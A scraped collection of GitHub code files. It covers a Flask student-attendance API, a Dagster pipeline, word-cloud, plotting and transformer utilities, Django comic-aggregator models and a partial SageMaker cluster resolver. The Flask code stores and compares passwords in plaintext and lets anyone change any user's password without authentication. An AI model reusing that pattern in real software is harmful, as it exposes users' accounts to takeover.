u'123'}\r\n user=USER.query.filter_by(Loginname=str(username_password['id'])).first()\r\n if not user:\r\n return jsonify({'state':'0','error':''})\r\n user_json=user.to_json()\r\n user=json.loads(user_json)\r\n # print(user['roleid'])\r\n if not user['roleid']==3:\r\n return jsonify({'state':'0','error':''})\r\n if user['password']==username_password['password']:\r\n return jsonify({'state':'1','error':''})\r\n return jsonify({'state':'2','error':''})\r\n\r\n@mod.route('/app/student/', methods=['get'])\r\ndef get_name(StudentNumber):\r\n\t# print(StudentNumber)\r\n\tstudent=STUDENT.query.filter_by(StudentNumber = StudentNumber).first()\r\n\treturn jsonify({'personnel':{'Pname':student.Studentname,'ID':StudentNumber,'Studentid':student.Studentid}})\r\n\r\n@mod.route('/app/student_course/', methods=['get'])\r\ndef get_course(StudentNumber):\r\n return_data=[]\r\n # print(StudentNumber)\r\n student=STUDENT.query.filter_by(StudentNumber = StudentNumber).first()\r\n id=student.Studentid\r\n # print(id)\r\n course_ids=Course_Student.query.filter_by(Studentid=id).all()\r\n for course_id in course_ids:\r\n # print(course_id.CourseId)\r\n course_data=Course.query.filter_by(CourseId=int(course_id.CourseId)).first()\r\n course_data=course_data.to_json()\r\n course_data=json.loads(course_data)\r\n # print(course_data)\r\n a={'cnameAndID':{'courseID':course_data['CourseId'] }}\r\n a['cnameAndID']['courseName']=course_data['CourseName']\r\n # print(a)\r\n return_data.append(a)\r\n # print(return_data)\r\n return jsonify({'marks':return_data,'data':'','error':''})\r\n\r\n\r\n@mod.route('/app/course_shape/', methods=['get'])\r\ndef get_course_shape(CourseId):\r\n course_data=Course.query.filter_by(CourseId=int(CourseId)).first()\r\n return jsonify({'shape':course_data.Layout})\r\n\r\n\r\n@mod.route('/app/student/sign/', methods=['put'])\r\ndef sign_status():\r\n sign_data=request.get_data()\r\n sign_data=json.loads(sign_data)\r\n # {'Studentid': 2, 'position': '5*5', 'courseID': 1}\r\n sign_time=time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\r\n Sign=SignData.query.filter_by(CourseId=sign_data['courseID']).order_by(SignData.StartData.desc()).first()\r\n if not Sign:\r\n return jsonify({'status':'error','data':'','error':'老师未发起签到'})\r\n sign_id=Sign.SignId\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Studentid=sign_data['Studentid']).first()\r\n if student_sign.Status=='签到' or student_sign.Status=='迟到':\r\n return jsonify({'status':'error','data':'','error':'你已签到'})\r\n sign_start_time=Sign.StartData\r\n sign_start_time=datetime.datetime.strptime(sign_start_time,\"%Y-%m-%d %H:%M:%S\")\r\n sign_time=datetime.datetime.strptime(sign_time,\"%Y-%m-%d %H:%M:%S\")\r\n timeout=sign_time-sign_start_time\r\n seconds=timeout.seconds\r\n if seconds < 120 :\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Place=sign_data['position']).first()\r\n if student_sign:\r\n return jsonify({'status':'error','data':'','error':'该位置已经有人'})\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Studentid=sign_data['Studentid']).first()\r\n student_sign.SignData=sign_time\r\n student_sign.Status=\"签到\"\r\n student_sign.Place=sign_data['position']\r\n db.session.commit()\r\n return jsonify({'status':'success','data':'','error':''})\r\n elif seconds < 7200:\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Place=sign_data['position']).first()\r\n if student_sign:\r\n return jsonify({'status':'error','data':'','error':'该位置已经有人'})\r\n student_sign=Course_Sign.query.filter_by(SignId=sign_id,CourseId=sign_data['courseID'],Studentid=sign_data['Studentid']).first()\r\n student_sign.SignData=sign_time\r\n student_sign.Status=\"迟到\"\r\n student_sign.Place=sign_data['position']\r\n db.session.commit()\r\n return jsonify({'status':'error','data':'','error':'签到成功,你已迟到'})\r\n else:\r\n return jsonify({'status':'error','data':'','error':'你迟到过久,记为旷课'})\r\n\r\n\r\n@mod.route('/app/student/change_pass', methods=['put'])\r\ndef change_pass():\r\n up_data=request.get_data()\r\n up_data=json.loads(up_data)\r\n user_data=USER.query.filter_by(Loginname=up_data['loginname']).first()\r\n user_data.password=up_data['password']\r\n db.session.commit()\r\n return jsonify({'status':'success','data':'','error':''})\r\n\r\n@mod.route('/app/student/kaoqin/', methods=['get'])\r\ndef get_kaoqin(studentid):\r\n return_data=[]\r\n course_ids=Course_Student.query.filter_by(Studentid=studentid).all()\r\n for course in course_ids:\r\n a={}\r\n course_id=course.CourseId\r\n course_data=Course.query.filter_by(CourseId=course_id).first()\r\n a['coursename']=course_data.CourseName\r\n a['ok']=0\r\n a['later']=0\r\n a['no']=0\r\n sign_datas=Course_Sign.query.filter_by(CourseId=course_id,Studentid=studentid).all()\r\n for sign in sign_datas:\r\n print(sign.get_Status())\r\n if sign.Status.decode(\"utf-8\") == \"签到\":\r\n a['ok']+=1\r\n if sign.Status.decode(\"utf-8\") == \"迟到\":\r\n a['later']+=1\r\n if sign.Status.decode(\"utf-8\") == \"旷课\":\r\n a['no']+=1\r\n return_data.append(a)\r\n return jsonify({'status':'success','data':return_data,'error':''})\r\n\r\n\r\n@mod.route('/app/student/nocourse/', methods=['get'])\r\ndef get_nocourse(studentid):\r\n courses=Course.query.all()\r\n return_data=[]\r\n for course in courses:\r\n course_id=course.CourseId\r\n data=Course_Student.query.filter_by(Studentid=studentid,CourseId=course_id).first()\r\n if not data:\r\n a={}\r\n a['coursename']=course.CourseName\r\n a['courseid']=course.CourseId\r\n teacher_id=course.TeachId\r\n teacher=Teacher.query.filter_by(TeachId = teacher_id).first()\r\n a['teachername']=teacher.TeachName\r\n a['CourseWeek']=course.CourseWeek\r\n a['CourseDay']=course.CourseDay\r\n a['CourseTime']=course.CourseTime\r\n a['CoursePlace']=course.CoursePlace\r\n return_data.append(a)\r\n return jsonify({'status':'success','data':return_data,'error':''})\r\n\r\n\r\n@mod.route('/app/student/add_course/', methods=['post'])\r\ndef add_course(courseid):\r\n add_data=request.get_data()\r\n add_data=json.loads(add_data)\r\n # {'studentid':studentid}\r\n # print(add_data)\r\n add=Course_Student(courseid,add_data['studentid'])\r\n db.session.add(add)\r\n db.session.commit()\r\n return jsonify({'status':'success','data':'','error':''})\r\n","repo_name":"yypnogg1011/16_daoyun","sub_path":"flask/app_student/app_student_op.py","file_name":"app_student_op.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"4663166460","text":"import os\n\nfrom dagster import default_executors\nfrom dagster import ModeDefinition\nfrom dagster import pipeline\nfrom dagster import PresetDefinition\nfrom dagster import ScheduleDefinition\n\nfrom .solids import step_five\nfrom .solids import step_four\nfrom .solids import step_one\nfrom .solids import step_seven\nfrom .solids import step_six\nfrom .solids import step_three\nfrom .solids import step_two\n\n### MODE\nlocal_mode = ModeDefinition(\n name=\"local\",\n executor_defs=default_executors,\n resource_defs={},\n)\n\n### PRESETS\nprod_preset = PresetDefinition.from_pkg_resources(\n name=\"prod\",\n mode=\"local\",\n pkg_resource_defs=[\n (\"pipelines_cookbook.cookbook.environments\", \"prod.yaml\"),\n ],\n)\n\ndev_preset = PresetDefinition.from_pkg_resources(\n name=\"dev\",\n mode=\"local\",\n pkg_resource_defs=[\n (\"pipelines_cookbook.cookbook.environments\", \"dev.yaml\"),\n ],\n)\n\n\n### PIPELINES\n@pipeline(mode_defs=[local_mode], preset_defs=[dev_preset, prod_preset])\ndef cookbook():\n one = step_one()\n two = step_two()\n three = step_three(one, two)\n\n four = step_four()\n five = step_five()\n six = step_six(four, five)\n\n step_seven(three, six)\n\n\n### REPOSITORY\npipelines = [cookbook]\n\nschedules = [\n ScheduleDefinition(\n name=\"cookbook\",\n cron_schedule=\"* * * * *\",\n pipeline_name=\"cookbook\",\n run_config=prod_preset.run_config,\n environment_vars=dict(os.environ),\n execution_timezone=\"Asia/Bangkok\",\n mode=\"local\",\n )\n]\n\nrepo = pipelines + schedules\n","repo_name":"devbaygroup/dagster-demo","sub_path":"pipelines_cookbook/cookbook/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"72265681001","text":"import jieba\r\nfrom wordcloud import WordCloud as wc\r\nfrom imageio import imread\r\n\r\ns=\"浅复制模式只能独立第一层,\\\r\n也就是说原变量和继承变量在可迭代对象中依然会同步修改。\"\r\n\r\nprint(s)\r\n\r\nprint(jieba.lcut(s)) #精确模式\r\nprint(jieba.lcut(s,cut_all=True)) #全模式\r\nprint(jieba.lcut_for_search(s)) #搜索引擎模式\r\n\r\ntemp=imread('3.png')\r\ntxt='蓝图上的落差终归只是理念上的区分,\\\r\n在实践场域的分野也未必明晰。\\\r\n譬如当我们追寻心之所向时,在途中涉足权力的玉墀,\\\r\n这究竟是伴随着期望的泯灭还是期望的达成?\\\r\n在我们塑造生活的同时,生活也在浇铸我们。\\\r\n既不可否认原生的家庭性与社会性,又承认自己的图景有轻狂的失真,\\\r\n不妨让体验走在言语之前。\\\r\n用不被禁锢的头脑去体味切斯瓦夫·米沃什的大海与风帆,\\\r\n并效维特根斯坦之言,对无法言说之事保持沉默。'\r\ntxt_list=jieba.lcut(txt)\r\nnew_txt=' '.join(txt_list)\r\n\r\npic=wc(scale=1.5,min_font_size=20,\r\n max_font_size=80,font_path='C:\\Windows\\Fonts\\msyh.ttc',\r\n mask=temp,background_color='white').generate(new_txt)\r\npic.to_file('words.png')\r\n","repo_name":"LemaxLMX/remote01","sub_path":"IDLE/jieba_and_wc_test.py","file_name":"jieba_and_wc_test.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72974675239","text":"# ASCII art printer\nfrom pyfiglet import figlet_format\nfrom termcolor import colored\n\n\ndef print_art(message, color):\n \"\"\"print_art(message, color) prints ASCII art in specified color.\"\"\"\n official_termcolors = ('red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')\n\n if color not in official_termcolors:\n color = 'magenta'\n\n ascii_art = figlet_format(message)\n colored_ascii = colored(ascii_art, color=user_color)\n print(ascii_art)\n\n\nprint(\"Welcome to ASCII Art Printer\")\nuser_message = str(input(\"What would you like to print? \"))\nuser_color = str(input(\"What color? \"))\nprint_art(user_message, user_color)\n","repo_name":"benj-lazaro/modern-python3-bootcamp","sub_path":"22-modules/07-ascii-art.py","file_name":"07-ascii-art.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4199020329","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.figure_factory as ff\nfrom plotly.offline import iplot\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport streamlit as st\n\n\n@st.cache()\ndef plot_distribution(dataframe, var_select=None, bins=1.0): \n df = dataframe.copy()\n # Calculate the correlation coefficient between the new variable and the target\n df[\"Churn\"] = df['Churn'].replace({\"Yes\":1, \"No\":0})\n tmp_churn = df[df['Churn'] == 1]\n tmp_no_churn = df[df['Churn'] == 0] \n corr = df['Churn'].corr(df[var_select])\n corr = np.round(corr,3)\n tmp1 = tmp_churn[var_select].dropna()\n tmp2 = tmp_no_churn[var_select].dropna()\n hist_data = [tmp1, tmp2]\n \n group_labels = ['Churned', 'Not churned']\n colors = ['indianred','seagreen' ]\n\n fig = ff.create_distplot(hist_data,\n group_labels,\n colors = colors, \n show_hist = True,\n curve_type='kde', \n bin_size = bins\n )\n \n fig['layout'].update(title = var_select+' '+'(Correlation with Churn ='+ str(corr)+')')\n # iplot(fig, filename = 'Density plot')\n\n return fig\n\n\n@st.cache()\ndef binary_ploting_distributions(dataframe, cat_col):\n df = dataframe.copy()\n \n fig = make_subplots(rows=1,cols=2,print_grid=True,horizontal_spacing=0.2, \n subplot_titles=(\"Distribution and % Churn\", \n f'Mean Monthly Charges of {cat_col}'))\n\n df[\"Churn\"] = df['Churn'].replace({\"Yes\":1, \"No\":0})\n tmp_churn = df[df['Churn'] == 1]\n tmp_no_churn = df[df['Churn'] == 0]\n # calculate churn / total count of categorical variables \n tmp_attr = round(tmp_churn[cat_col].value_counts().sort_index() / df[cat_col].value_counts().sort_index(),2)*100\n\n t1 = tmp_churn[cat_col].value_counts().sort_index()\n t2 = df[cat_col].value_counts().sort_index().rename(f'Total-{cat_col}')\n data_points = pd.concat([t1, t2], axis=1)\n\n data_points.columns = ['Churn Count', 'Total']\n data_points['Churned %'] = round((data_points['Churn Count'] / data_points['Total']) * 100, 2)\n \n\n\n trace1 = go.Bar(\n x=tmp_churn[cat_col].value_counts().sort_index().index,\n y=tmp_churn[cat_col].value_counts().sort_index().values,\n name='Churned',opacity = 0.8, marker=dict(\n color='indianred',\n line=dict(color='#000000',width=1)))\n\n trace2 = go.Bar(\n x=tmp_no_churn[cat_col].value_counts().sort_index().index,\n y=tmp_no_churn[cat_col].value_counts().sort_index().values,\n name='Not Churned', opacity = 0.8, \n marker=dict(\n color='seagreen',\n line=dict(color='#000000',\n width=1)\n )\n )\n\n trace3 = go.Scatter( \n x=tmp_attr.sort_index().index,\n y=tmp_attr.sort_index().values,\n yaxis = 'y2',\n name='% Churn', opacity = 0.6, \n marker=dict(\n color='black',\n line=dict(color='#000000',\n width=2 )\n )\n )\n df_tmp = (df.groupby(['Churn', cat_col])['MonthlyCharges'].mean().reset_index())\n tmp_churn = df_tmp[df_tmp['Churn'] == 1]\n tmp_no_churn = df_tmp[df_tmp['Churn'] == 0]\n\n df_tmp = (df.groupby(['Churn', cat_col])['MonthlyCharges'].mean()).unstack('Churn').reset_index()\n df_tmp['diff_rate'] = round((df_tmp[1] / df_tmp[0]) - 1,2) * 100\n\n trace4 = go.Bar(\n x=tmp_churn[cat_col],\n y=tmp_churn['MonthlyCharges'], showlegend=False,\n name='Mean Charge Churn',opacity = 0.8, marker=dict(\n color='indianred',\n line=dict(color='#000000',width=1)))\n\n trace5 = go.Bar(\n x=tmp_no_churn[cat_col],\n y=tmp_no_churn['MonthlyCharges'],showlegend=False,\n name='Mean Charge NoChurn', opacity = 0.8, \n marker=dict(\n color='seagreen',\n line=dict(color='#000000',\n width=1)\n )\n )\n\n trace6 = go.Scatter( \n x=df_tmp[cat_col],\n y=df_tmp['diff_rate'],\n yaxis = 'y2',\n name='% Diff Churn', opacity = 0.6, \n marker=dict(\n color='black',\n line=dict(color='#000000',\n width=5 )\n )\n )\n\n fig.append_trace(trace1, 1, 1)\n fig.append_trace(trace2, 1, 1) \n fig.append_trace(trace3, 1, 1)\n fig.append_trace(trace4, 1, 2)\n fig.append_trace(trace5, 1, 2)\n fig.append_trace(trace6, 1, 2) \n\n fig['data'][2].update(yaxis='y3')\n fig['data'][5].update(yaxis='y4')\n\n fig['layout']['xaxis'].update(autorange=True,\n tickfont=dict(size= 10), \n title= f'{cat_col}', \n type= 'category',\n )\n fig['layout']['yaxis'].update(title= 'Count')\n\n fig['layout']['xaxis2'].update(autorange=True,\n tickfont=dict(size= 10), \n title= f'{cat_col}', \n type= 'category',\n )\n fig['layout']['yaxis2'].update( title= 'Mean Monthly Charges' )\n\n fig['layout']['yaxis3']=dict(range= [0, 100], #right y-axis in subplot (1,1)\n overlaying= 'y', \n anchor= 'x', \n side= 'right', \n showgrid= False, \n title= '%Churn Ratio'\n )\n\n #Insert a new key, yaxis4, and the associated value:\n fig['layout']['yaxis4']=dict(range= [-20, 100], #right y-axis in the subplot (1,2)\n overlaying= 'y2', \n anchor= 'x2', \n side= 'right', \n showgrid= False, \n title= 'Monthly % Difference'\n )\n fig['layout']['title'] = f\" Distributions of {cat_col} (Total Churned / Not Churned and % of Total Churned / Not Churned)\"\n fig['layout']['height'] = 500\n fig['layout']['width'] = 1200\n \n df_tmp.columns = [cat_col, 'NotChurned', \"Churned\", \"Difference\"]\n return fig, data_points, df_tmp\n\n\n\ncolor_op = ['#5527A0', '#BB93D7', '#834CF7', '#6C941E', '#93EAEA', '#7425FF', '#F2098A', '#7E87AC', \n '#EBE36F', '#7FD394', '#49C35D', '#3058EE', '#44FDCF', '#A38F85', '#C4CEE0', '#B63A05', \n '#4856BF', '#F0DB1B', '#9FDBD9', '#B123AC']\n\n\ndef plot_pie(dataframe, df_cat, df_value, limit=15):\n\n df = dataframe.copy()\n\n df[\"Churn\"] = df['Churn'].replace({\"Yes\":1, \"No\":0})\n tmp_churn = df[df['Churn'] == 1].groupby(df_cat)[df_value].sum().nlargest(limit).to_frame().reset_index()\n tmp_no_churn = df[df['Churn'] == 0].groupby(df_cat)[df_value].sum().nlargest(limit).to_frame().reset_index()\n\n p1= go.Pie(labels = tmp_churn[df_cat], values=tmp_churn[df_value], name='Churn', hole=0.5, domain= {'x': [0, .5]})\n p2 = go.Pie(labels = tmp_no_churn[df_cat], values=tmp_no_churn[df_value], name='No Churn', hole=0.5,domain= {'x': [.5, 1]} )\n layout = dict(title= f\"Total {df_value} by {df_cat}\" , height=450,width=1200, font=dict(size=15),\n annotations = [\n dict(\n x=.22, y=.5,\n text='Churn', \n showarrow=False,\n font=dict(size=20)\n ),\n\n dict(\n x=.8, y=.5,\n text='No Churn', \n showarrow=False,\n font=dict(size=20)\n ),\n \n ])\n\n fig = dict(data=[p1, p2], layout=layout)\n\n\n \n return fig, tmp_churn, tmp_no_churn ","repo_name":"pratik-poudel/churn-prediction","sub_path":"utils/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":8054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3419471855","text":"#!/usr/bin/env python\n\nimport click\nimport analyzer\n\nimport os\nimport pathlib\n\n@click.command()\n@click.argument(\"layout\")\ndef main(layout):\n layout_path = pathlib.Path(f\"layouts/{layout}\")\n if not layout_path.exists():\n print(f\"layouts/{layout} not found\")\n return -1\n\n analyzer.analyze(layout_path)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Apsu/chordite","sub_path":"chordite.py","file_name":"chordite.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70695669479","text":"import numpy as np\nimport tensorflow as tf\n\ndef get_angles(pos, i, d_model):\n angle_rates = 1 / np.power(10000, (2 * (i//2)) / np.float32(d_model))\n return pos * angle_rates\n\n\ndef positional_encoding(position, d_model):\n angle_rads = get_angles(np.arange(position)[:, np.newaxis],\n np.arange(d_model)[np.newaxis, :],\n d_model)\n\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n\n pos_encoding = angle_rads[np.newaxis, ...]\n\n return tf.cast(pos_encoding, dtype=tf.float32)","repo_name":"HRSadeghi/NeuralPersianPoet","sub_path":"models/layers/transformer_utils.py","file_name":"transformer_utils.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"8843006820","text":"# -*- coding: utf-8 -*-\nfrom math import atan, sqrt\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom comicagg.comics.fields import ComicNameField, AltTextField\nfrom comicagg.accounts.models import UserProfile\n\nclass Comic(models.Model):\n \"\"\"\n Comics can be: A active, E ended\n \n E/A T F\n T - 2\n F 1 3\n 1. Active AND not Ended - all ok, ongoing\n 2. Not active AND Ended - finished\n 3. Not active and not Ended - not working, needs fixing\n So visible to the user should be 1 and 2\n \"\"\"\n\n name = ComicNameField('Name', max_length=255)\n website = models.URLField(\"Website\")\n active = models.BooleanField('Is active?', default=False, help_text='The comic is ongoing and gets epdated regularly.')\n notify = models.BooleanField('Notify the users?', default=False,\n help_text=\"\"\"This is always disabled. If it's enabled when saving the comic, the users will be notified of the new comic.\"\"\")\n ended = models.BooleanField('Has ended?', default=False,\n help_text='Check this if the comic has ended. Also mark it as inactive.')\n no_images = models.BooleanField(\"Don't show images?\", default=False,\n help_text='Use it to hide the images of the comic, but allow a notification to the users.')\n\n custom_func = models.TextField('Custom update function', null=True, blank=True,\n help_text='Check the docs for reference.')\n\n # First regex section\n re1_url = models.URLField('URL of the page where the image can be found', null=True, blank=True,\n help_text='If the redirection URL is used, this field will not be used.')\n re1_base = models.CharField('Base URL for the image URL', max_length=255, null=True, blank=True,\n help_text='It must contain the placeholder %s which will be replaced with whatever matches in the regex.')\n re1_re = models.CharField('Regular expression', max_length=255, null=True, blank=True,\n help_text=\"\"\"It must contain one group (between parentheses) that matches the URL of the image.\n Named groups can also be used:
    \n - url for the URL of the image: (?P<url>.+)
    \n - alt for the alternative text of the image: (?P<alt>.+)\"\"\")\n re1_backwards = models.BooleanField('Check backwards.', default=False,\n help_text=\"Read the page backwards by line (last line first).\")\n\n # Second regex section\n re2_url = models.URLField('URL where the page of the image can be found', null=True, blank=True,\n help_text=\"\"\"Setting this enables the redirection. The engine will open this URL and\n use the regex in this section to search for the URL of the page where the image can be found.\"\"\")\n re2_base = models.CharField('Base URL for the page URL', max_length=255, null=True, blank=True,\n help_text='It must contain the placeholder %s which will be replaced with whatever matches in the regex.')\n re2_re = models.CharField('Regular expression', max_length=255, null=True, blank=True,\n help_text=\"\"\"It must contain one group (between parentheses) that matches the URL of the page.\n Named groups can also be used:
    \n - url for the URL of the page: (?P<url>.+)\"\"\")\n re2_backwards = models.BooleanField('Check backwards.', default=False,\n help_text=\"Read the page backwards by line (last line first).\")\n\n # Other settings\n # FUTURE: Consider removing this and always use the first URL as referer\n referer = models.URLField('Referer', null=True, blank=True,\n help_text='Set this to a URL that the web will accept as referer when getting an update.')\n\n last_update = models.DateTimeField('Last update', blank=True)\n last_image = models.URLField('Last image URL', blank=True)\n last_image_alt_text = AltTextField('Last image alt text', blank=True, null=True)\n\n positive_votes = models.IntegerField('Positive votes', default=0)\n total_votes = models.IntegerField('Total votes', default=0)\n\n add_date = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['name']\n permissions = (\n (\"all_images\", \"Can see all images\"),\n )\n\n def __init__(self, *args, **kwargs):\n super(Comic, self).__init__(*args, **kwargs)\n self._reader_count = None\n self._strip_count = None\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n notify = False\n # If the user saved this with the notify field to true\n if self.notify:\n notify = True\n self.notify = False\n super(Comic, self).save(*args, **kwargs)\n if notify:\n # Create a NewComic object for each user\n users = User.objects.all()\n for user in users:\n up = UserProfile.objects.get(user=user)\n if up.alert_new_comics:\n up.new_comics = True\n new = NewComic(user=user, comic=self)\n new.save()\n up.save()\n\n def get_rating(self, method='statistic_rating'):\n if not hasattr(self, '__rating'):\n r = getattr(self, method)()\n setattr(self, '__rating', r)\n return getattr(self, '__rating')\n\n def statistic_rating(self):\n pos = self.positive_votes\n n = self.total_votes\n if n == 0:\n return 0.0\n #z = Statistics2.pnormaldist(1-power/2)\n z = 3.95\n phat = 1.0*pos/n\n return (phat+z*z/(2*n)-z*sqrt((phat*(1-phat)+z*z/(4*n))/n))/(1+z*z/n)\n\n def mi_rating(self):\n r = 0.5\n if self.total_votes > 0:\n #p = self.positive_votes\n #n = self.total_votes - self.positive_votes\n #x = p - n\n x = 2 * self.positive_votes - self.total_votes\n if x > 0:\n r = ((20-atan(x/5.0)/(x/100.0))/40+0.5)\n elif x < 0:\n r = (0.5-(20-atan(x/5.0)/(x/100.0))/40)\n #porcentaje de votos positivos\n #r = int(floor(self.positive_votes / float(self.total_votes) * 100))\n #porcentaje de votos negativos\n #n = 100 - r\n #g(x)=2/sqrt(pi)*(x-x^3/3+x^5/10-x^7/42+x^9/216)\n return r\n\n def positive_votes_perc(self):\n try:\n r = float(self.positive_votes) / self.total_votes\n except:\n r = 0.0\n return r\n\n def negative_votes(self):\n return self.total_votes - self.positive_votes\n\n def reader_count(self):\n if not self._reader_count:\n self._reader_count = self.subscription_set.count()\n return int(self._reader_count)\n\n def strip_count(self):\n if not self._strip_count:\n self._strip_count = self.comichistory_set.count()\n return int(self._strip_count)\n\n def last_image_url(self):\n url = self.last_image\n if self.referer:\n url = reverse('comics:last_image_url', kwargs={'cid':self.id})\n return url\n\n def last_strip(self):\n return self.comichistory_set.all()[0]\n\n # User related methods\n # FUTURE: Remove this? Still used in views\n def unread_comics_for(self, user):\n return UnreadComic.objects.filter(comic=self, user=user)\n\n# FUTURE: We may want to move this elsewhere\ndef active_comics():\n \"\"\"Returns a QuerySet of Comic objects that a user can follow. Includes ended comics.\"\"\"\n # FUTURE: Should not include ended comics?\n return Comic.objects.exclude(active=False)\n\nclass Subscription(models.Model):\n \"\"\"A user follows a certain comic and the position of the comic in the reading list.\"\"\"\n\n user = models.ForeignKey(User)\n comic = models.ForeignKey(Comic)\n position = models.PositiveIntegerField(blank=True, default=0)\n\n class Meta:\n ordering = ['user', 'position']\n\n def __str__(self):\n return '%s - %s' % (self.user, self.comic)\n\n def delete(self, *args, **kwargs):\n # Delete the related unread comics\n UnreadComic.objects.filter(user=self.user, comic=self.comic).delete()\n super(Subscription, self).delete(*args, **kwargs)\n\nclass Request(models.Model):\n user = models.ForeignKey(User)\n url = models.URLField()\n comment = models.TextField(blank=True, null=True, default=\"\")\n admin_comment = models.TextField(blank=True, null=True, default=\"\")\n done = models.BooleanField(default=False)\n rejected = models.BooleanField(default=False)\n\n class Meta:\n ordering = ['id', '-done']\n\n def __str__(self):\n return '%s - %s' % (self.user, self.url)\n\n# FUTURE: Rename this to ComicStrip\nclass ComicHistory(models.Model):\n comic = models.ForeignKey(Comic)\n date = models.DateTimeField(auto_now_add=True)\n url = models.CharField(max_length=255)\n alt_text = AltTextField('Alternative text', blank=True, null=True)\n\n class Meta:\n ordering = ['-id']\n get_latest_by = \"date\"\n\n def __str__(self):\n return '%s %s' % (self.comic.name, self.date)\n\n def image_url(self):\n url = self.url\n if self.comic.referer:\n url = reverse('comics:history_url', kwargs={'hid':self.id})\n return url\n\nclass UnreadComic(models.Model):\n user = models.ForeignKey(User)\n history = models.ForeignKey(ComicHistory)\n comic = models.ForeignKey(Comic)\n \n class Meta:\n ordering = ['user', '-history']\n\n def __str__(self):\n return '%s %s' % (self.user, self.history)\n \n\nclass Tag(models.Model):\n user = models.ForeignKey(User)\n comic = models.ForeignKey(Comic)\n name = models.CharField(max_length=255)\n \n class Meta:\n ordering = ['name', 'comic']\n\n def __str__(self):\n return '%s' % (self.name)\n #return '%s - %s - %s' % (self.name, self.comic, self.user)\n \nclass NewComic(models.Model):\n user = models.ForeignKey(User)\n comic = models.ForeignKey(Comic, related_name=\"new_comics\")\n \n def __str__(self):\n return '%s - %s' % (self.user, self.comic)\n","repo_name":"comicagg/comicagg","sub_path":"comicagg/comics/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"4001574404","text":"import json\nimport os\n\nfrom tensorflow.python.distribute.cluster_resolver.cluster_resolver import ClusterResolver\nfrom tensorflow.python.training.server_lib import ClusterSpec\n\n# List of envs\n# https://github.com/aws/sagemaker-training-toolkit/blob/master/ENVIRONMENT_VARIABLES.md\n# Only support Multi-Worker Mirrored Strategy\n\n_SESSION_MASTER_KEY = 'session_master'\n_RPC_LAYER_KEY = 'rpc_layer'\n_TASK_KEY = 'task'\n_CLUSTER_KEY = 'cluster'\n_WORKER_KEY = 'worker'\n_INDEX_KEY = 'index'\n_TYPE_KEY = 'type'\n\n_SM_CURRENT_HOST = 'SM_CURRENT_HOST'\n_SM_HOSTS = 'SM_HOSTS'\n\n\ndef format_master_url(master, rpc_layer=None):\n if rpc_layer:\n return '%s://%s' % (rpc_layer, master)\n else:\n return master\n\n\ndef _load_tf_config(port):\n # Create a tf_config from SM Variables\n assert all([x in os.environ for x in [_SM_CURRENT_HOST, _SM_HOSTS]\n ]), 'Not a SageMaker Environment'\n hosts = sorted(json.loads(\n os.environ[_SM_HOSTS])) if os.environ[_SM_HOSTS] != '' else []\n current_host = os.environ[_SM_CURRENT_HOST]\n\n if current_host not in hosts:\n return {}\n\n host_index = hosts.index(current_host)\n # Assign ports\n hosts = ['%s:%s' % (host, port) for host in hosts]\n\n tf_config = {\n _CLUSTER_KEY: {\n _WORKER_KEY: hosts\n },\n _TASK_KEY: {\n _TYPE_KEY: _WORKER_KEY,\n _INDEX_KEY: host_index\n }\n }\n return tf_config\n\n\ndef _get_value_in_tfconfig(key, port, default=None):\n tf_config = _load_tf_config(port)\n return tf_config[key] if key in tf_config else default\n\n\nclass SageMakerClusterResolver(ClusterResolver):\n \"\"\"Implementation of a ClusterResolver which reads the Sagemaker EnvVars. This is an implementation of cluster resolvers when running in a SageMaker environment to set information about the cluster.\n\n The cluster spec returned will be initialized from the SageMaker\n environment variables.\n Currently this Cluster Resolver only supports Multi-Worker Mirrored Strategy.\n It assumes all nodes in a SageMaker Cluster are workers.\n \"\"\"\n\n def __init__(self,\n port=2223,\n task_type=None,\n task_id=None,\n rpc_layer=None,\n environment=None):\n \"\"\"Creates a new SageMakerClusterResolver.\n\n Args:\n port: (integer, optional) Override default port usage of 2223\n task_type: (String, optional) Overrides the task type.\n task_id: (Integer, optional) Overrides the task index.\n rpc_layer: (String, optional) Overrides the rpc layer TensorFlow uses.\n environment: (String, optional) Overrides the environment TensorFlow\n operates in.\n \"\"\"\n self._task_type = task_type\n self._task_id = task_id\n self._rpc_layer = rpc_layer\n self._environment = 